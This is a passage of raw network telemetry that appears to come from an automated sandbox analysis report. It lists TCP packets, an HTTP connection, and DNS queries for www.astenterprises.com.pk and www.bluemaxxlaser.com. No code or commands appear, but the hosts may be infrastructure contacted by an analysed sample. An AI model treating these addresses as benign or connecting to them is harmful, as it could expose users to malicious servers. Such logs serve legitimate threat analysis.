                                                                                    Dec 19, 2024 12:44:30.355665922 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.402590990 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.475691080 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.475717068 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.475739956 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.475747108 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.475780010 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.475790024 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.475815058 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.475832939 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.475862026 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.585323095 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.585365057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.585453033 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.585472107 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.585499048 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.585513115 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.633996964 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.634031057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.634085894 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.634098053 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.634134054 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.634145021 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.761383057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.761408091 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.761509895 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.761537075 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.761580944 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.790765047 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.790827990 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.790858030 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.790864944 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.790885925 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.790904999 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.815531969 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.815558910 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.815607071 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.815617085 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.815640926 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.815818071 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.844228029 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.844263077 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.844301939 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.844307899 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.844343901 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.844358921 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.948739052 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.948769093 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.948808908 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.948820114 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.948863029 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.948889017 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.966922045 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.966952085 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.967004061 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.967039108 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.967061996 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.967084885 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.986330986 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.986358881 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.986414909 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.986442089 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:30.986455917 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:30.986484051 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.005815983 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.005841017 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.005923986 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.005953074 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.005995989 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.023442984 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.023464918 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.023525000 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.023540974 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.023582935 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.042368889 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.042397976 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.042443991 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.042470932 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.042490005 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.042509079 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.127589941 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.127609015 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.127693892 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.127722979 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.127763033 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.141202927 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.141222954 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.141278982 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.141307116 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.141325951 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.141339064 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.152599096 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.152615070 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.152678013 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.152704000 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.152743101 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.164603949 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.164622068 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.164681911 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.164709091 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.164755106 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.176316977 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.176335096 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.176403046 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.176429987 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.176487923 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.187099934 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.187114000 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.187181950 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.187202930 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.187256098 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.198160887 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.198179007 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.198259115 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.198268890 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.198313951 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.208313942 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.208331108 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.208384037 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.208391905 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.208435059 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.321152925 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.321173906 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.321269989 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.321289062 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.321325064 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.328907967 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.328923941 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.328994036 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.329001904 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.329051018 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.335627079 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.335643053 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.335709095 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.335716963 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.335772991 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.343110085 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.343123913 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.343192101 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.343198061 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.343240023 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.350167990 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.350186110 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.350253105 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.350277901 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.350323915 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.357456923 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.357475996 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.357547045 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.357553005 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.357613087 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.365020990 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.365035057 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.365099907 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.365106106 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.365160942 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.371900082 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.371916056 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.371983051 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.371993065 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.372035980 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.513612986 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.513643026 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.513705969 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.513732910 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.513748884 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.513777971 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.519779921 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.519817114 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.519859076 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.519876957 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.519890070 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.519927979 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.527004957 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.527044058 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.527102947 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.527128935 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.527143002 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.527173996 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.534310102 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.534337997 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.534442902 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.534451962 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.534504890 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.541205883 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.541232109 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.541312933 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.541340113 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.541393042 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.548584938 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.548605919 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.548680067 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.548697948 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.548738956 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.555066109 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.555099964 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.555150986 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.555177927 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.555191994 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.555221081 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.562470913 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.562495947 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.562566042 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.562591076 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.562630892 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.704782009 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.704809904 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.704958916 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.704991102 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.705034018 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.711957932 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.711977005 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.712064981 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.712090015 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.712138891 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.718453884 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.718470097 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.718555927 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.718580961 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.718625069 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.725907087 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.725936890 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.726067066 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.726082087 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.726130009 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.732707977 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.732726097 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.732789040 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.732799053 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.732855082 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.740206003 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.740223885 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.740289927 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.740298033 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.740340948 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.748016119 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.748032093 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.748126984 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.748133898 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.748176098 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.753838062 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.753854036 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.753947020 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.753953934 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.753998995 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.896806955 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.896828890 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.896895885 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.896931887 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.896969080 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.903990984 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.904006958 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.904059887 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.904068947 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.904108047 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.904131889 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.910605907 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.910620928 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.910674095 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.910680056 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.910713911 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.910732031 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.917886019 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.917903900 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.917964935 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.917972088 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.918013096 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.924964905 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.924983025 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.925024986 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.925031900 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.925055027 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.925071001 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.932171106 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.932198048 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.932239056 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.932245016 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.932277918 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.932296991 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.939380884 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.939405918 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.939480066 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.939487934 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.939522982 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.939533949 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.945887089 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.945911884 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.945955992 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.945960999 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:31.945988894 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:31.946008921 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:32.083842993 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:32.083925009 CET44349712107.161.23.150192.168.2.7
                                                                                    Dec 19, 2024 12:44:32.083954096 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:32.084002972 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:32.086507082 CET49712443192.168.2.7107.161.23.150
                                                                                    Dec 19, 2024 12:44:32.532793045 CET4972380192.168.2.7203.175.174.69
                                                                                    Dec 19, 2024 12:44:32.652463913 CET8049723203.175.174.69192.168.2.7
                                                                                    Dec 19, 2024 12:44:32.652582884 CET4972380192.168.2.7203.175.174.69
                                                                                    Dec 19, 2024 12:44:32.652717113 CET4972380192.168.2.7203.175.174.69
                                                                                    Dec 19, 2024 12:44:32.772438049 CET8049723203.175.174.69192.168.2.7
                                                                                    Dec 19, 2024 12:44:34.184578896 CET8049723203.175.174.69192.168.2.7
                                                                                    Dec 19, 2024 12:44:34.230745077 CET4972380192.168.2.7203.175.174.69
                                                                                    Dec 19, 2024 12:44:35.712686062 CET4972380192.168.2.7203.175.174.69

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 19, 2024 12:44:28.506200075 CET4977453192.168.2.71.1.1.1
                                                                                    Dec 19, 2024 12:44:28.644074917 CET53497741.1.1.1192.168.2.7
                                                                                    Dec 19, 2024 12:44:32.274039984 CET5523853192.168.2.71.1.1.1
                                                                                    Dec 19, 2024 12:44:32.527728081 CET53552381.1.1.1192.168.2.7
                                                                                    Dec 19, 2024 12:44:44.077353001 CET5848453192.168.2.71.1.1.1
                                                                                    Dec 19, 2024 12:44:57.426554918 CET6307153192.168.2.71.1.1.1
                                                                                    Dec 19, 2024 12:45:21.520437956 CET5176453192.168.2.71.1.1.1

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 19, 2024 12:44:28.506200075 CET192.168.2.71.1.1.10x3fb3Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:32.274039984 CET192.168.2.71.1.1.10x4cc6Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:44.077353001 CET192.168.2.71.1.1.10xaa8aStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:57.426554918 CET192.168.2.71.1.1.10x4eeaStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:45:21.520437956 CET192.168.2.71.1.1.10x520Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 19, 2024 12:44:28.644074917 CET1.1.1.1192.168.2.70x3fb3No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
